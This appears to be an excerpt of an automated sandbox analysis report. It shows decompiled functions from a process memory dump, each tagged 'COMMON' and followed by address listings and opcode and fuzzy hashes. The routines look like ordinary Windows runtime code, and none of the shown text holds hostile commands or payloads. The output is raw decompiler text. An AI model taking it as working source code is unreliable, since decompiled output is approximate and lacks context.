				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0102FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0102B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01004620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E00FECCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x10d8504
								E00FFFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01014F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x01014bad
0x01014bbf
0x01014bc2
0x01014bc6
0x01014bcd
0x01014bd9
0x010567fe
0x01056800
0x01014ccc
0x01014ccd
0x01014cb7
0x01014cc9
0x01014cc9
0x01014bdf
0x01014be5
0x00000000
0x00000000
0x01014beb
0x01014bef
0x00000000
0x00000000
0x01014bf5
0x01014bf9
0x01014c06
0x01014c0b
0x01014c17
0x01014c1c
0x01014c1f
0x01014c25
0x01014c33
0x01014c3d
0x01014c40
0x01014c43
0x01014c47
0x01014c4d
0x01014c53
0x01014c54
0x01014c55
0x01014c56
0x01014c5b
0x01014c5c
0x01014c63
0x01014c6b
0x00000000
0x00000000
0x01056776
0x01056784
0x01056784
0x0105679f
0x010567a7
0x010567af
0x010567ce
0x00000000
0x010567b1
0x010567b7
0x010567b8
0x010567c1
0x010567d3
0x010567d9
0x010567dd
0x01014c94
0x01014c94
0x01014c98
0x01014c9c
0x01014ca3
0x010567f4
0x010567f4
0x01014cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x01014cb5
0x01014c79
0x01014c7e
0x01014c89
0x01014c8b
0x01014c8f
0x01014c8f
0x00000000
0x01014c89
0x010567c3
0x00000000
0x010567c3
0x010567af
0x01014c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a811dc926a2c2ccf86ceec7854b427998a9b4e84470d16e21e168587fb18507d
Instruction ID: 1a544d04b34171478ff2c3eb39939c490158afd98f2a558963ffe663135cf731
Opcode Fuzzy Hash: a811dc926a2c2ccf86ceec7854b427998a9b4e84470d16e21e168587fb18507d
Instruction Fuzzy Hash: BE419335A0022D9BDBA1DF68C940BEEB7F4FF45740F4100A5E988EB251DB799E84CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00FF8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00FF8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x10dd360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0102B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E00FFE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0xfc1180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01011DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01023C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E00FF8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x00ff8a0a
0x00ff8a1c
0x00ff8a23
0x00ff8a2e
0x00ff8a30
0x00ff8a36
0x00ff8a3c
0x00ff8a3e
0x00ff8a4a
0x00ff8a52
0x00ff8a9c
0x00ff8aae
0x00ff8a58
0x00ff8a5e
0x00ff8a6a
0x00ff8a6f
0x00ff8a75
0x00ff8a7d
0x00ff8a85
0x00ff8a86
0x00ff8a89
0x00ff8a93
0x00ff8a99
0x00ff8a9b
0x00000000
0x00ff8aaf
0x00ff8abe
0x00ff8ac3
0x00ff8acb
0x00ff8ad7
0x00ff8ae0
0x00ff8af1
0x00000000
0x00ff8af1
0x00ff8acd
0x00ff8ad5
0x00ff8afb
0x00ff8afd
0x00ff8aff
0x00ff8b07
0x00ff8b22
0x00ff8b24
0x00ff8b2a
0x00ff8b2e
0x00ff8b3f
0x00ff8b78
0x00ff8b41
0x00ff8b52
0x00ff8b54
0x00ff8b5c
0x00ff8b74
0x00ff8b74
0x00ff8b5c
0x00ff8b3f
0x00ff8b5e
0x00ff8b61
0x00ff8b64
0x00ff8b64
0x00ff8b6c
0x00ff8b6c
0x00ff8b11
0x01049cd5
0x01049cd5
0x00ff8b17
0x00ff8b1a
0x00ff8b1a
0x00000000
0x00ff8ad5
0x00ff8a89

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d7ada47cd24e20bb21d44507b34cd5fd74ad18fd70f3d933985b85ab0160df
Instruction ID: 48e0d54223f98fb2bc9a84741a2b3cc9c45d8137a9ba3a9f3784bdd00b2a9911
Opcode Fuzzy Hash: c5d7ada47cd24e20bb21d44507b34cd5fd74ad18fd70f3d933985b85ab0160df
Instruction Fuzzy Hash: A04180B1A0022D9BDB24DF15CC88BB9B7B4FF94350F1041EADA1997262EB749E81DF50

Uniqueness

Uniqueness Score: -1.00%

Function 010669A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E010669A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x10dd360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L00FF6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01066BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01029980() >= 0) {
							E01002280(_t56, 0x10d8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x10d8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x10d8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E00FEB6F0(0xfcc338, 0xfcc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01029520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E010295D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E00FFFFB0(_t68, _t77, 0x10d8778);
				}
				_pop(_t78);
				return E0102B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x010669b5
0x010669be
0x010669c3
0x010669c9
0x010669cc
0x010669d1
0x010669d3
0x010669de
0x010669e1
0x010669ea
0x010669f6
0x010669fe
0x01066a13
0x01066a14
0x01066a15
0x01066a16
0x01066a1e
0x01066a26
0x01066a31
0x01066a36
0x01066a37
0x01066a40
0x01066a49
0x01066a4a
0x01066a53
0x01066a59
0x01066a5d
0x01066a5e
0x01066a64
0x01066a67
0x01066a6a
0x01066a6d
0x01066a70
0x01066a77
0x01066a7d
0x01066a86
0x01066a89
0x01066a9c
0x01066a9f
0x01066aa2
0x01066aa5
0x01066aaf
0x01066ab1
0x01066ab8
0x01066ab9
0x01066abb
0x01066abe
0x01066ac5
0x01066ac5
0x01066aaf
0x01066a40
0x01066a26
0x010669fe
0x01066ace
0x01066ad0
0x01066ad3
0x01066ad8
0x01066adf
0x01066adf
0x01066ae8
0x01066aef
0x01066aef
0x01066af9
0x01066b06

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
Instruction ID: 256817df2442ec42153a83f1a5856e329145d9d0a0349cb49c3b317f9dd351ac
Opcode Fuzzy Hash: 04bb591858dfd4e907ef08768264a291e89c21b0e4e6658698d0c25cc8e95771
Instruction Fuzzy Hash: DA419CB1D00219AFDB20CFAAC940BFEBBF8FF48714F04816AE994A7250DB359905CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00FE5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00FE5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E00FE52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010295D0();
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E00FFEB70(_t54, 0x10d79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E010295D0();
								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E00FFEB70(_t54, 0x10d79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0102F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E00FFEB70(_t54, 0x10d79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E010295D0();
							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x00fe5220
0x00fe5224
0x01040d13
0x01040d16
0x01040d19
0x00fe522a
0x00fe522a
0x00fe522d
0x00fe522d
0x00fe5231
0x00fe5235
0x00fe5239
0x01040d5c
0x01040d62
0x00000000
0x00000000
0x01040d6a
0x01040d7b
0x01040d7f
0x01040d81
0x01040d84
0x01040d95
0x01040d95
0x01040d6c
0x01040d71
0x01040d71
0x01040d9a
0x00000000
0x00fe524a
0x00fe524a
0x00fe5250
0x01040d24
0x01040d35
0x01040d39
0x01040d3b
0x01040d3e
0x01040d50
0x01040d50
0x01040d26
0x01040d2b
0x01040d2b
0x00000000
0x01040d55
0x00fe5256
0x00fe525b
0x00fe5265
0x01040da7
0x00fe526b
0x00fe526e
0x00fe5272
0x01040db1
0x01040db4
0x01040dc5
0x01040dc5
0x00fe5272
0x00fe5278
0x00fe527e
0x00fe528a
0x00fe528c
0x00fe528d
0x00000000
0x00fe5280
0x00fe5282
0x00fe5288
0x00fe529f
0x00fe5292
0x00000000
0x00fe5292
0x00000000
0x00fe5288
0x00fe527e

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
Instruction ID: 77bb86fa87f3b929a0511dd2b96a96fd917581b0fb3406e5c5929008f9550dae
Opcode Fuzzy Hash: c0a7c546c119014700a7e3d3b65d1cb53c36fb154d592254731042bb5d353ba7
Instruction Fuzzy Hash: ED314632241A11EBC722AF29CC81BAA77A5FF10B64F104629FAD95B1A5DB30F800D790

Uniqueness

Uniqueness Score: -1.00%

Function 01023D43, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01023D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E00FF7B60(0, _t61, 0xfc11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E00FF7B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						_t12 =  &(_t61[2]); // 0x8bc4eb00
						 *((short*)( *_t12 + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01004620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}

0x01023d4c
0x01023d50
0x01023d55
0x01023d5e
0x0105e79a
0x00000000
0x0105e79a
0x01023d68
0x0105e789
0x01023d9d
0x01023da3
0x01023daf
0x01023db5
0x01023dbc
0x01023dc4
0x01023dc9
0x01023dce
0x0105e7ae
0x0105e7ae
0x01023dd9
0x01023dde
0x01023de2
0x01023de7
0x01023e0d
0x01023e13
0x01023e16
0x01023e1e
0x01023e25
0x01023e28
0x00000000
0x00000000
0x01023e2a
0x01023e2f
0x01023e37
0x01023e37
0x00000000
0x01023e37
0x01023e31
0x00000000
0x01023e31
0x01023e20
0x01023e20
0x01023e35
0x00000000
0x01023de9
0x01023de9
0x01023de9
0x01023dee
0x01023dfd
0x01023dff
0x01023e02
0x01023e05
0x01023e05
0x00000000
0x01023df0
0x01023de7
0x0105e78f
0x0105e794
0x01023d79
0x01023d84
0x01023d89
0x01023d8e
0x00000000
0x0105e7a4
0x01023d96
0x01023d9a
0x00000000
0x01023d9a
0x00000000
0x0105e794
0x01023d6e
0x01023d73
0x00000000
0x0105e7b5
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
Instruction ID: 7a097eff17057702bafa377429d25248661c92e08dd662453c111c52df0c73b7
Opcode Fuzzy Hash: 7bdf0ee0ebb50538b706792da0ee73ad45d8b7dfc559ff53f1631ae53e7214b2
Instruction Fuzzy Hash: BC31AF31A04625DBDB659F2DD841A7BBBF5FF49700B0580AAE9C6CF391E638D840C791

Uniqueness

Uniqueness Score: -1.00%

Function 0101A61C, Relevance: .1, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0101A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x10c0220);
				E0103D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x10d7b9c; // 0x0
				_t55 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0103D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x10d7b10 =  *0x10d7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x10d536c; // 0x77f05368
					if( *_t51 != 0x10d5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x10d5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x10d536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0101A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}

0x0101a61c
0x0101a61e
0x0101a623
0x0101a628
0x0101a62b
0x0101a62d
0x0101a648
0x0101a64a
0x0101a64f
0x01059b44
0x0101a6ec
0x0101a6f1
0x0101a6f1
0x0101a655
0x0101a657
0x0101a65a
0x0101a65d
0x0101a662
0x0101a663
0x0101a667
0x0101a668
0x0101a66d
0x0101a706
0x0101a706
0x01059bda
0x01059be6
0x01059beb
0x00000000
0x01059beb
0x0101a679
0x01059b7a
0x00000000
0x01059b7a
0x0101a683
0x0101a6f4
0x0101a6f7
0x0101a6f9
0x0101a6fd
0x0101a6a0
0x0101a6a0
0x0101a6ad
0x0101a6af
0x0101a6b4
0x01059ba7
0x01059bac
0x00000000
0x00000000
0x01059bc6
0x01059bce
0x01059bd1
0x01059bd3
0x01059bd3
0x00000000
0x01059bd1
0x0101a6bd
0x0101a6c3
0x0101a6c6
0x0101a6d2
0x0101a701
0x0101a704
0x00000000
0x0101a704
0x0101a6d4
0x0101a6d6
0x0101a6d9
0x0101a6db
0x0101a6e1
0x0101a6e6
0x0101a6e8
0x0101a6e8
0x0101a6ea
0x00000000
0x0101a6ea
0x0101a688
0x0101a692
0x0101a694
0x0101a699
0x00000000
0x00000000
0x0101a69d
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
Instruction ID: fe8ea8d1d4674ae0cd2b9a227da359f98484023bb3d39ed91b9b6810f767214e
Opcode Fuzzy Hash: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
Instruction Fuzzy Hash: FA418CB5A01345DFDB15CF58C990B9DBBF1BB89314F1880A9ED84AB348C779A901CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0100C182, Relevance: .1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0100C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01007D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E010B8D34(_v8, _t80);
					}
					E01002280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00FFFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E010B8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00FFFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0102B180();
						if(_a4 != 0) {
							E01002280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0100BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0100BB2D(_t16, _t15);
						E0100B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00FFFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00FFFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00FFFFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x0100c18d
0x0100c18f
0x0100c191
0x0100c19b
0x0100c1a0
0x0100c1d4
0x0100c1de
0x01052d6e
0x0100c1e4
0x0100c1e4
0x0100c1e4
0x0100c1ec
0x01052d7d
0x01052d7d
0x0100c1f3
0x0100c1ff
0x01052d88
0x01052d8d
0x01052d94
0x01052d94
0x01052d9f
0x01052da4
0x01052dab
0x01052db0
0x01052db2
0x01052db3
0x01052db4
0x01052dbc
0x01052dc3
0x01052dc3
0x0100c205
0x0100c205
0x0100c208
0x0100c20e
0x0100c211
0x0100c216
0x0100c219
0x0100c21f
0x0100c222
0x0100c22c
0x0100c234
0x0100c23a
0x0100c23f
0x0100c245
0x0100c24b
0x0100c251
0x0100c25a
0x0100c276
0x0100c27d
0x0100c27d
0x0100c25c
0x0100c25c
0x00000000
0x0100c25e
0x0100c1a4
0x0100c1aa
0x0100c1b3
0x0100c265
0x0100c26c
0x0100c26c
0x00000000

Memory Dump Source

Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
